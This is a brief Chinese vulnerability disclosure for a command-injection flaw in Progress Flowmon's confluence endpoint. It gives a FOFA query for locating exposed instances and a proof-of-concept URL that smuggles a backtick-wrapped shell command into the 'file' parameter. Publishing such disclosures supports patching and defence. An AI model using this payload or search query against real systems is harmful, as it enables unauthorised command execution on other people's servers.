声明：

本文仅用于技术交流，请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。

简介

ProgressFlowmon是一整套用于网络映射、应用程序性能以及日志和配置管理的工具。

ProgressFlowmon的confluence接口存在任意命令执行漏洞。

资产搜索

fofa:

body="Flowmon-Web-Interface"

漏洞复现

https://127.0.1/service.pdfs/confluence?lang=en&file=`ping 域名`